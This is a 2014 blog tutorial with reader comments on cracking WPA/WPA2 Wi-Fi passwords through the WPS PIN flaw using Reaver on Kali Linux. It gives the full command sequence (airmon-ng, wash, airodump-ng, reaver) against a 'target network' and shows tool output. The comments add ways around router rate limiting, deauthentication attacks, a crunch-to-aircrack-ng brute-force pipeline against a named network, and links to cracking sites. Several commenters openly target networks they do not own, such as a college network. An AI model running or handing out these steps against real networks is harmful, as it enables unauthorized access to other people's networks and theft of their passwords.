Monday, April 7, 2014

Hack WPA/WPA2 WPS - Reaver - Kali Linux

WPA/WPA-2


When it was known that a WEP network could be hacked by any kid with a laptop and a network connection (using easy peasy tutorials like those on our blog), the security guys did succeed in making a much more robust security measure WPA/WPA2.
Now hacking WPA/WPA2 is a very tedious job in most cases. A dictionary attack may take days, and still might not succeed. Also, good dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase lowercase) and numbers, may take years, depending on password length. Rainbow tables are known to speed things up, by completing a part of the guessing job beforehand, but the output rainbow table that needs to be downloaded from the net is disastrously large (can be 100s of GBs sometimes). And finally the security folks were at peace. But it was not over yet, as the new WPA technology was not at all easy for the users to configure. With this in mind, a new security measure was introduced to compliment WPA. Wifi Protected Setup (WPS). Now basically it was meant to make WPA even tougher to crack, and much easier to configure (push a button on router and device connects). However, it had a hole, which is now well known, and tools like reaver can exploit it in a single line statement. It still might take hours, but it is much better than the previous scenario in which months of brute-forcing would yield no result.



Here's what wikipedia says about WPS-
Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. Prior to the standard, several competing solutions were developed by different vendors to address the same need. A major security flaw was revealed in December 2011 that affects wireless routers with the WPS feature, which most recent models have enabled by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 pre-shared key. Users have been urged to turn off the WPS feature, although this may not be possible on some router models.

 Working Of WPS

Now while most of the things are the same as in WPA, there is a new concept of using pins for authentication. So basically, the client sends 8 digit pins to the access point, which verifies it and then allows the client to connect. Now a pin has 8 digits, and only contains numbers, so its a possible target for bruteforece. Under normal bruteforcing of WPA passwords, you have to consider the fact that there may be number, alphabets, and sometimes symbols (and more than 8 letters). This make the task a billion billion times tougher. However, we can try thousands of keys per second, which make it a tad bit easier. Now in WPS, there is a delay because we have to wait for APs response, and we may only try a few keys per second (practically the best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume one key per second. Now that'll be years. So, where is this taking us? The answer is, there are flaws in this technology that can be used against it. 
  • The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time. Two months, still a way to go.
  • The pin number for verification goes in two halves, so we can independently verify the first four and the last four digits. And believe me, its easy to guess 4 digits correct two times, than to guess 8 correct digits at once. Basically, the first half would take 10^4 guess and the second would take 10^3.
Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000 guesses.
So that'll take 3 hours approximately. And that's all the combinations, and most probably the correct pin will not be the last combination, so you can expect to reach the result earlier. However, the assumption is that bruteforcing will take place at a key per second. My personal best is a key every 2 seconds, and yours might drop to as low as a key every 10 seconds. 


How to carry out the attack

Now it might have been tough to carry out this attack at some point in history, but now, its a breeze. If you have all the prerequisites, then hacking the network would be as easy as
reaver -i <interface-name> -b <BSSID of target>
And if you are already familiar with hacking WEP, then just go to your Kali Linux terminal and type the above command (replacing what needs to be replaced). Leave your machine as is, come back 10 mins later, check the progress (must be 1% or  something), and go take a nap. However, if you're a newbie, then tag along.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Reaver on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on hacking with Kali Linux. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines, and you might have to do a live boot using live CD or live USB of Kali Linux. See the last section of this post on = troubleshooting by scrolling down a bit)

Information Gathering

Now you need to find out the following about you target network-
  • Does it have WPS enabled. If not, then the attack will not work.
  • The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either use wash or just use the good old airodump-ng. Wash is specifically meant to check whether a network has WPS enabled or not, and thereby is much easier to use. Here are the steps-

  • Set your wireless interface in monitor mode- 
airmon-ng start wlan0

  •  Use wash (easy but sometimes unable to detect networks even when they have wps enabled). If any network shows up there, it has WPS enabled.
wash -i mon0

This will show all the networks with WPS enabled

This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move on to airodump method. Update :  wash -i mon0 --ignore-fcs  might solves the issue.


  • Use airodump-ng. It will show all networks around you. It tells which of them use WPA. You'll have to assume they have WPS, and then move to next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.

BSSID of the network - Now irrespective of what you used, you should have a BSSID column in the result that you get. Copy the BSSID of the network you want to hack. That's all the information you need.

So by now you must have something like XX:XX:XX:XX:XX:XX, which is the BSSID of your target network. Keep this copied, as you'll need it.

Reaver

Now finally we are going to use Reaver to get the password of the WPA/WPA2 network. Reaver makes hacking very easy, and all you need to do is enter-
reaver -i mon0 -b XX:XX:XX:XX:XX:XX 
Explanation = i  - interface used. Remember creating a monitor interface mon0 using airmon-ng start wlan0. This is what we are using. -b species the BSSID of the network that we found out earlier.
This is all the information that Reaver needs to get started. However, Reaver comes with many advanced options, and some are recommended by me. Most importantly, you should use the -vv option, which increases the verbosity of the tool. Basically, it writes everything thats going on to the terminal. This helps you see whats happening, track the progress, and if needed, do some troubleshooting.  So final command should be-
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
After some hours, you will see something like this. The pin in this case was intentionally 12345670, so it was  hacked in 3 seconds.



WPA PSK : X
X is the password of the wireless network.

Here is an extra section, which might prove useful.

Known problems that are faced - Troubleshooting

  1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6". (Yours will be mon0 instead of wlan0). Sometimes, it keeps switching interfaces forever.
  2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for beacon frame stage.
  3. Sometimes it never associates with the target AP.
  4. Sometimes the response is too slow, or never comes, and a (0x02) or something error is displayed.
In most cases, such errors suggest-
  1. Something wrong with wireless card.
  2. AP is very choosy, won't let you associate.
  3. The AP does not use WPS.
  4. You are very far from the AP.
  5. Rate Limiting implemented in the router (most new router have this)
Possible workarounds-
  1. Sometimes, killing naughty processes helps. (see pictures below)
  2. Move closer to target AP
  3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell Reaver not to bother as we are already associated using -A (just add -A at the end of your normal reaver code)
  4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't know why, but sometimes internal adapters work wonders, and can't be used from inside of a VM. In my case, booting up from USB and using internal adapter increased the signal strength and speeded up the bruteforce process. Update : It has nothing to do with internal adapter. I have verified this with many others, and it is now a known problem with Reaver. It does not work well inside Virtual machines. It is recommended that you do a live boot.
  5. As far as rate limiting is concerned, there are few workarounds available in forums across the web, but nothing seems to work with 100% certainty. Here is a relevant discussion of gitlab, here is a solution on hack5 forums which has a script and uses mdk5 tool (it doesn't work for me, it's supposed to DOS the router and reset the ban temporarily), and here is a thread on Kali Forums on the same issue, which has various possible solutions listed (including a method which changes your MAC address regularly [sorry if the download link on the thread there doesn't work] and hence allows reaver to work against routers which lock the particular MAC address which is attacking them and don't lock down completely). 
  6. Update: For some people the reason Reaver is not working is because the version of Libpcap you are using is not compatible with the version of Kali you are using.
processes causing problems

Kill 'em all


A lot of people have shared their experiences in the comments section. Help out if you can, seek help if you need any. I can't always respond, but someone usually does.

Can't get it to work

Even after all your attempts, if you can't get it to work, then the AP just isn't vulnerable. You have the following alternatives-
  1. If you were following the tutorials one by one in the order shown in the top navigation bar (Hack With Kali -> Wireless Hacking), then you have learnt all you needed in this tutorial (even if you failed to get WPA-PSK), and can move to the next ones.
  2. If you just want to see if you can hack a WPA network, then there are three posts below which will help you with that without relying on WPS vulnerability.

Full blown cracking

Need to follow both these guides, as they are step 1 and step 2 in the procedure of hacking WPA2 wifi networks.


Shortcut method, attack the human, not the network

Fool a client who knows the password into connecting to a fake wifi network and giving you the password of the genuine one.

122 comments:

  1. Are there any another ways of wpa/wpa2 except reaver and aircrack?tx

    ReplyDelete
    Replies
    1. Wifite is there. It also uses Reaver only, except it types the commands for you.

      http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html

      Delete
    2. Friends , I'm from Brazil , very pleased . Would have a solution to this? - WARNING: Detected AP rate limiting, waiting 60 seconds

      Delete
    3. Friends , I'm from Brazil , very pleased . Would have a solution for this? - WARNING : Detected AP rate limiting , waiting 60 seconds .

      Thanks for listening

      Delete
    4. alex, try the option -N. Much quieter and probably will not activate rate limiting. you could also use -d [time in seconds] to set a delay time between attempts. start with a number like 10 then work down. good luck!

      Delete
    5. alex, try the option -N. Much quieter and probably will not activate rate limiting. you could also use -d [time in seconds] to set a delay time between attempts. start with a number like 10 then work down. good luck!

      Delete
    6. I don't have any ideas because I tried everything reaver,broutefource,wifite, and many more so I think I am missing something which I don't know or not exist yet so If u or anyone of u know something plz tell me
      My email is rahulspide26@gmail.com

      Delete
  2. has anybody else used fern?

    ReplyDelete
    Replies
    1. The only notable thing about Fern is the GUI. It makes stuff easy for beginners, but honestly, that's no way of becoming a hacker. GUI should be avoided most of the time.

      Delete
    2. Yes i used fern foe wep security it takes 30 minuts to break the WEP password

      Delete
  3. To rid the FSC issue:
    #wash -i wlan0 --ignore-fcs

    ReplyDelete
  4. ok .but how to hack WPA/WPA2 with psk ??

    ReplyDelete
  5. Is possible to hack a wpa2 network with a random alphanumerical 15 characters password? I think this kind of psw does not exist in any dictionary..

    ReplyDelete
  6. Hi there, i m trying to do it on my college wifi, although network supports wps but on giving the reaver command as you said, it reverts me a kind of note "failed to retrieve a MAC address ".

    Also i m not able to successfully getting a WPA handshake with the command "aireplay-ng --deauth 1 -a mon0". Plz can u solve these problems

    ReplyDelete
    Replies
    1. when i type the command to see all networks as "airodump-ng mon0", after selecting a particular bssid when i hit command "airodump-ng -w (name of essid) --bssid (bssid of the network) mon0 -c (number of the channel)" it reverts me same window but at the right upper corner it always swiches channel from one to another or some times fixed to particular, it shows like "fixed channel mon0:-1", plz solve this problem!

      Delete
    2. So I've done everything without problems but after checking the terminal Reaver says that there is approximately 207 hours and 36 minutes remaining. Is that normal?

      Delete
  7. i used crunch to create a word list for brute force,but for only numerical word list it tooks 100's of gb,how can a get word list for less than 10 gb

    ReplyDelete
  8. i google it and i got this
    "crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w -"

    ReplyDelete
    Replies
    1. Looks good enough.
      I think it'll work just fine.

      Delete
  9. Can you tell me how to boot kali linux from CD? Currently i am using in virtual box.

    ReplyDelete
    Replies
    1. Try Live USB instead. http://docs.kali.org/installation/kali-linux-live-usb-install

      Delete
    2. got a power iso..and then use the tool option where u can fing Creat bootable pendrive.Then select the iso file ...then after the complete, restart the pc from pendrive..All done..Select the boot method.thats st

      Delete
  10. Can any one tell me about how can we change the channel of any network which is appearing on airodump terminal. As sometimes my mon0 is fixed to channel 1 so may be i can receive a network on 1 which previously coming on channel 6 or 7 whatever

    ReplyDelete
    Replies
    1. ifconfig wlan0 channel 6
      ifconfig won0 channel 6
      airodump-ng mon0 -c 6
      That should be enough.

      Delete
  11. Please Shashwat, can u provide me a good wordlist, because i have one wordlist which is about 22 MB of .txt file but i have tried it on a network with fern, finally result came out, 'the list does not contain the password'. So please give a link of wordlist which u think that would be enough break the pass.

    ReplyDelete
    Replies
    1. have you tried creating your own with the crunch command? if you are looking for a good wordlist I would reccomend rockyou.txt its ~14 million passwords and 60 mbs https://wiki.skullsecurity.org/Passwords

      Delete
    2. have you tried creating your own with the crunch command? if you are looking for a good wordlist I would reccomend rockyou.txt its ~14 million passwords and 60 mbs https://wiki.skullsecurity.org/Passwords

      Delete
  12. how to get a SSID of a hidden network

    ReplyDelete
    Replies
    1. Use aireplay-ng to carry out a de-authentication attack on a client. After that when the client reconnects you'll get the SSID.

      Delete
  13. hi, can i ask few question.

    first is i try cracking wpa2 pass, i almost finish cracking and at the last step need to use this command

    "aircrack-ng -w wordlist.txt --bssid 00:11... wordlist-01.cap"

    but it says that my wordlist can't be found. so how i want to check this wordlist or how can i make it.

    second is i try to use this command

    "wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s"

    but it only replay

    ''[!] Found packet with bad FCS, skipping...''

    and never stop. can help me please.
    hope to get this info ASAP.

    ReplyDelete
    Replies
    1. You have to download the wordlist from the internet.
      Try --ignore-fcs, it might solve the bad FCS issue.

      Delete
  14. I get the 0x03 and the 0x04 error all the time "WPS transaction failed, re-trying last pin". I had tried with different networks but is always the same . One of them says "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking, but that is all it does. What can I do? :'(

    ReplyDelete
  15. I get the 0x03 and the 0x04 error all the same ("WPS transaction failed, re-trying last pin"). I have tried with different networks, but is always the same. One of them says: "WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking", but that is all it does. What can I do? :'(

    ReplyDelete
  16. Thanks! I dual booted and it solved the problem :D

    ReplyDelete
  17. Since I have only 150GB for Kali installation, I use Reaver all the time. Is one of the best tools I used. It doesn't consume disk space or hardware resources. Is just what everyone who's testing want.
    One thing I do and could help someone, is to make Reaver start from a specified number. If you know the WPS default first numbers and you may think that WPS wasn't changed, you can Google to find the first 1, 2, 4 numbers... Then, you give all the information to Reaver you would put normaly, and, in the attribute -P put the first numbers you may know. Execute the command and stop it a few seconds later by pressing CTRL+C. Don't be scared if you saw that the WPS PIN sent is 4 numbers long. Now, you should run again the same command but erasing -P this time. Now, program will think that it checked the previous PINs and will take less time. Or more, if the password is not default... But if you have no patience, you could try it out. I.e., if you give to the app 4 first numbers, the scan will take only 1:30h with 999 tries.
    This is also a way to avoid the manual edit of './usr/local/etc/reaver/*.wpc'.

    Sorry for my poor English lvl, I did not sleep and I'm even worse. :c

    ReplyDelete
    Replies
    1. Thank you for sharing this with us. Your English is fine by the way.

      Delete
  18. hi when we trying 2 or 3 pins in kali linux using reaver its getting error occur just like that ( WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking)

    ReplyDelete
  19. I keep on getting this -
    WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Switching mon0 to channel 11
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2015-02-01 11:32:53 (0 seconds/pin)
    [+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
    [+] Trying pin 12345670

    Why is it trying the same pin again and again..??

    ReplyDelete
    Replies
    1. Maybe you're too far from the AP (signal strength?). Maybe you need a better wireless adapter (are you using laptop's internal card?). Maybe the AP does not have WPS enabled (does the AP appear in wash?)

      Delete
    2. Yes it does!
      I'm using laptop's internal wireless adapter.
      I think I should use an external adapter becuase sometimes ARP injection (WEP) doesn't work too

      Delete
    3. Yes you should use external adapter. The internal ones do a good job in receiving messages from AP but they aren't so good at (and are not designed to) inject packets into the AP (i.e. they aren't as good in transmitting packets as they are in recieving them).

      Delete
  20. Prateek, I wasn't able to do much either until yesterday.
    I got a decent wireless card and after that I was able to associate via aireplay-ng -1 and as soon as that happened I ran reaver. Now I am dealing with the wps lock, but I am taking my time. Patience is a virtue ;)

    ReplyDelete
  21. How can i install wine in 64 bit kali linux?????

    ReplyDelete
  22. every time I try either wash or airodump-ng it comes up saying that it fails to open mon0 for capturing. Do I need to use a wifi adapter or use alive version of kali linux from USB?

    ReplyDelete
  23. What if Wps is not active on the router??

    ReplyDelete
    Replies
    1. Then you cannot hack it. WPS must be enabled in order to attack the AP via pin attempts.

      Delete
    2. Try to attack it with a wordlist instead. The author of this article mentioned it above.

      Delete
  24. Is there a way to hacking wireless network in which wps disabled?
    It was activated before, but now is Off

    ReplyDelete
  25. I have made a modification in reaver to automatize the process for the pixie dust attack, here is the github (https://github.com/t6x/reaver-wps-fork-t6x), here is the discussion topic (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)

    ReplyDelete
  26. Hi, reaver in my pc is slow, 10 second/pin
    how do i speed up?

    ReplyDelete
  27. hello i followed this tut but is it okeey is me terminal keep saying:
    [+] 0.00% complete @ 2015-04-30 21:36:28 (0 seconds/pin)
    [+] Max time remaining at this rate: (undetermined) (11000 pins left to try)

    im running kali on me crappy netbook should i use me dekt5op with Virtual box instead?

    thanks for the help

    ReplyDelete
  28. [#] Drone Hijacking With Maldrone — Drone Malware

    http://beinghaxor.blogspot.com/2015/05/drone-hijacking-with-maldrone-drone.html

    ReplyDelete
  29. [#] Traffic Lights Hacking

    http://beinghaxor.blogspot.com/2015/05/traffic-lights-hacking.html

    ReplyDelete
  30. AP rate limiting detected...
    any solution to this problem?

    ReplyDelete
  31. wash -i mon0 -C.
    Reaver com comandos -L -E -A -T 2 -d 2 e outros comandos resultam.
    Para desbloquear WPS?

    ReplyDelete
  32. Is there any free online book or pdf for kali linux hacker beginner?

    ReplyDelete
  33. Hello, i am facing a lot of errors when i'm usin kali linux, actually i can't do anything because it comes with errors every time i try cracking wpa og creating Payloads.

    When using reaver i ger this error code: 0x04 i am typing in this

    reaver -i mon0 -b "BSSID" -d "delayed time" -S -N -vv

    where -S should increase cracking speed and -N should stop the nacking
    I have tried with -d 5/10/15/20/25/30 and also tried with and without -S i have tried with and without -N i have tried -c that specifies the channel.

    But it keeps saying WPS transaction failed error code: 0x04

    Why is that?

    And when i try out this specific command
    reaver -i mon0 -A -b 00:30:4F:XX:XX:XX - c 6 -d 10 -vv --no-nacks --win7

    It comes up with the error [!] WARNING: Receive timeout occurred

    Why is that, and how does i fix these reaver problems i am facing?
    I have researched on google for 2 days now, and no one has the answer i am looking for.

    Also when i use the wash command the RSSI = 0 on all the networks that i can find.
    I think this is the main problem for why reaver doesn't work

    And just another thing, when i try using the setoolkit, when i have pressed 1 - 10 and try pressing 1 for social engineering tool it says something about ratte_module not defined. if someone has a link to fix that, i would be soooo happy :-)

    ReplyDelete
    Replies
    1. I think the error code 0x04 occures when recieving M1 Message and sending out M2. The -N should stop this (i have read), but it doesn't. i wil copy the outcome in the terminal and post it here later.

      Delete
  34. I have followed everything but when I start the reaver I am getting "WPS transaction failed (code: 0x03), re-trying last pin" I am using an external wlan.

    ReplyDelete
    Replies
    1. Did you check with wash if WPS is enabled? Maybe they are using rate limiting measures.

      Delete
    2. try using reaver with -N or --no-nacks option

      Delete
  35. When I use reaver to attack it stops when it outputs waiting for a beacon. If I don't specify which channel the network is it will just flip through the channels over and over. Any advice?

    ReplyDelete
    Replies
    1. Fix a channel on your wlan0 and mon0 interface. The beacon frame issue resolved itself in my case (one day it was there, then it was not). I suspect it might have something to do with signal strength.

      Delete
  36. Does Reaver still works? or has most companies already patched their WPS so that this method doesn't work anymore? If it works which external wireless card would work? Thank you.

    ReplyDelete
  37. i need help with external adapters for my vm for my mac 10.10 do you know any i could get

    ReplyDelete
  38. please help i cant find a adapter that will work with my computer

    ReplyDelete
    Replies
    1. lol go to pc part picker after looking up what components are inside your computer on the manufacturers site after you know what motherboard you have it shouldn't be very hard to find a compatible adapter

      Delete
  39. wifite not working man..
    after so long waiting of 8 mins it says 0/1 wpa attacks failed...
    is there something i can do?

    ReplyDelete
  40. this error ("detecting ap limit rate") keeps comming after 10 pin test what to do about it any solution and it dosn't
    go for a whole day

    ReplyDelete
  41. when do we have to use wordlist in the tutorial ??

    ReplyDelete
  42. Is it possible to try to find out the password of a wifi network that you're connected to ? Because I am just trying to test my own connection.Thanks

    ReplyDelete
    Replies
    1. go into your windows network settings and "Forget This Network" then proceed with the tutorial

      Delete
    2. yeah its actaully really simple
      right click on the w-lan icon in your taskbar and choose "network and idk(im german)", as soon as the window opens choose your connected w-lan and clck on "wireless features" now there should be a tab called security, in which you can check a box that says "show symbols". Youre welcom :D

      Delete
  43. If network-manager is being used in ubuntu you get error "SIOCSIFFLAGS: Name not unique on network" first stop network-manager.

    /etc/init.d/network-manager stop

    ReplyDelete
  44. Dose it need an internet connection to hack wifi

    ReplyDelete
  45. Please help me. im using tplink tl-wn722n according to recommended wireless adapter.. But unable to work with reaver again... What i have to to.. The problm is ap rate limit of 60 sec.. And in pixiewps unable to crack wps. It just stoped automatically without trying any pin..

    ReplyDelete
  46. i connected with wifi .How i get wps pin of this wifi.So that i get password al the time easily when password will change.

    ReplyDelete
  47. I bet every last one of you geeks has long hair, a heavy metal t-shirt and a complexion that has never seen the sun. Grep a life!

    ReplyDelete
    Replies
    1. And you would be incorrect. Short hair (what's left of it at 46) pretty strong tan from being out on the boat every weekend, married with a child, and no heavy metal t shirts for the last 20 years or so. awk-ward.

      Delete
  48. oops! I have a problem,when i enter "reaver -i mon0 -b xx:xx:xx:xx:xx -vv" this command writes over and over and nothing will happen,please help me!
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    ReplyDelete
  49. Is there anybody here?

    ReplyDelete
  50. Any ideas on what to do when you get wps pin but wpa psk is '' (empty brackets)?
    What other tools or techniques could be used to obtain wpa psk?

    ReplyDelete
  51. Once you get pin do you just enter it in place of the password key when logging in ?

    ReplyDelete
  52. what to do with wps pin as i know the wps pin of wifi?? how to hack password??

    ReplyDelete
  53. Just Try This Bash Script ;)

    https://www.youtube.com/watch?v=IxHR-_p5JrY

    ReplyDelete
  54. i just wanna know this way will work on the LIVE BOOTED KALI LINUX 1.1 OR 2.0 . I have both

    ReplyDelete
  55. Hey everyone I have a stupid question. When running reaver I almost instantly get the following:
    root@bt:~# reaver -i mon0 -b 00:26:F2:26:B3:12 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:26:F2:26:B3:12
    [+] Switching mon0 to channel 6
    [+] Associated with 00:26:F2:26:B3:12 (ESSID: DO_946757)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 10 seconds
    [+] WPS PIN: '12345670'
    [+] WPA PSK: ''
    [+] AP SSID: 'DO_946757'
    [+] Nothing done, nothing to save.
    root@bt:~#

    So my question is what is the password no actually? I have tried '12345670' and 'DO_946757' but does not work. If I go with the -p option I get:
    root@bt:~# reaver -i mon0 -b 00:26:F2:26:B3:12 -vv -p 12345670

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:26:F2:26:B3:12
    [+] Switching mon0 to channel 6
    [+] Associated with 00:26:F2:26:B3:12 (ESSID: DO_946757)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 4 seconds
    [+] WPS PIN: '12345670'
    [+] Nothing done, nothing to save.
    root@bt:~#
    Thanks for any help.

    ReplyDelete
    Replies
    1. Hello does someone know what the problem is?

      Delete
  56. hello,
    every time I try either wash or airodump-ng it comes up saying that it fails to open mon0 for capturing. Do I need to use a wifi adapter I'm using live version of kali linux from USB
    can anyone help?

    ReplyDelete
    Replies
    1. Instead of wlan0, type
      airmon-ng start wlan0

      Ifconfig wlan0mon down
      Iwconfig wlan0mon mode monitor
      Ifconfig wlan0mon up

      That should work, did for me.

      Delete
    2. Ifconfig
      Choose your interface card.(wlan0)internal or (wlan1)external
      Ifconfig wlan0 up
      Airmon-ng start wlan0 (monitor will be wlan0mon)
      Check if AP WPS locked or no.
      airodump-ng -c[channel] --wps [wlan..mon]
      Replace [channel = 1-11]
      ex. airodump-ng -c 1 --wps wlan0mon
      replace [wlan..mon]
      ex. airodump-ng -c 1 --wps wlan0mon
      While --wps is display wps locked or no
      Use airodump-ng give you best result than wash .

      Delete
    3. Ifconfig
      Choose your interface card.(wlan0)internal or (wlan1)external
      Ifconfig wlan0 up
      Airmon-ng start wlan0 (monitor will be wlan0mon)
      Check if AP WPS locked or no.
      airodump-ng -c[channel] --wps [wlan..mon]
      Replace [channel = 1-11]
      ex. airodump-ng -c 1 --wps wlan0mon
      replace [wlan..mon]
      ex. airodump-ng -c 1 --wps wlan0mon
      While --wps is display wps locked or no
      Use airodump-ng give you best result than wash .

      Delete
  57. How to Crack WPA/WPA2|WPA/WPA2 Cracker
    http://lobatandawgs.com/54-wpa-wpa2-cracker.html

    http://shanghaiblackgoons.com/57-wpa-wpa2-cracker.html

    ReplyDelete
  58. after reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

    it shows

    Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
    [-] Failed to retrieve a MAC address for interface'mon0'...

    plzz tell me what to do now ?

    ReplyDelete
  59. Even after 2 hours of processing all that happens on my terminal screen is switching from channel to another, is that normal?

    ReplyDelete
  60. When i use the Wash command the RSSI = 00 on all the networks that i can find......In the videos i have watched from YouTube the RSSI values are all different depending on the strength of the signal....So i am guessing this is why i am not having any luck so far cracking any AP's

    Does anyone have a solution for this problem......

    Thanks.....

    ReplyDelete
  61. hi guy.it seems that kali dont work in my pc.dont execute anything.tell me what should i do???

    ReplyDelete
  62. Hey fellas i made a video on YouTube concerning wps locked routers. If u have issues like ap rate limiting detected or see wps locked in wash scan simply watch this video. Like, share and subscribe.
    https://m.youtube.com/watch?v=y3ByYdVJFqg

    ReplyDelete
  63. Hi, thanks for the tutorial.

    You should add to the reaver command the channel number with "-c" parameter. It wasn't working for me without it, staying stuck in "Waiting for beacon" state.
    For example:
    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6

    ReplyDelete
  64. friend please help me..............
    when i wrote airmon-ng wlan0
    then it shows that
    ls: cannot access/sys/clss/ieee80211/: no such file or directory
    usage: airmon-ng {channel or frequency}



    please help me.......................

    ReplyDelete
  65. hi guys,

    how you can do a brute force of wps pin withj a list?

    ReplyDelete
  66. hi guys,

    how you can do a brute force of wps pin withj a list?

    ReplyDelete
  67. I am getting this msg at the end :

    Input/output error

    Any ideas ?

    ReplyDelete
  68. How to setup wifite using kali linux in VM?

    ReplyDelete
  69. Where I can get 11000 pins guesses list? I need it for androdumpper for mobile

    ReplyDelete
  70. hacking wifi with Reaver can be fun and easy but for pro work and better chance Aircrack the old school is better ;)
    just like its showed in this post
    Cracking WPA2 wifi password

    ReplyDelete
  71. Hi, its works fine but at the end two lines keep repeating
    Sending EP0L start request
    WARNING: Receive timeout occurred.

    Anyone can help please Thanks

    ReplyDelete
  72. Hello all.....wpa is cracked... well done...so what ?
    How can i now connect to AP and use cracked wifi ? Because finally is the main goal. just use it... thanks by advance & regards.

    ReplyDelete
    Replies
    1. Reaver will provide you with WPA PSK after it successfully gets the pin. That PSK is the password of the network.

      Delete
  73. I am using an external USB Alfa adaptor (AWUS036NH), WPS is enabled on the router, and I am in a room directly above the router. At first reaver just kept trying the same PIN (12345670). After 9 hours is was at 0%. I added -N and it tried a few different PINs and got to 0.03%, then started trying the same pin over and over again. Any suggestions?

    ReplyDelete
  74. can u give me some trick how to do

    ReplyDelete
  75. Hi Shashwat,

    Thank you very much for your tutorials they are really useful.

    Reaver has reached 11000 pin attempts and didn't find the PSK so now the limit changed to 20000 pin attempts. Is this normal?


    Cheers,
    Owl

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC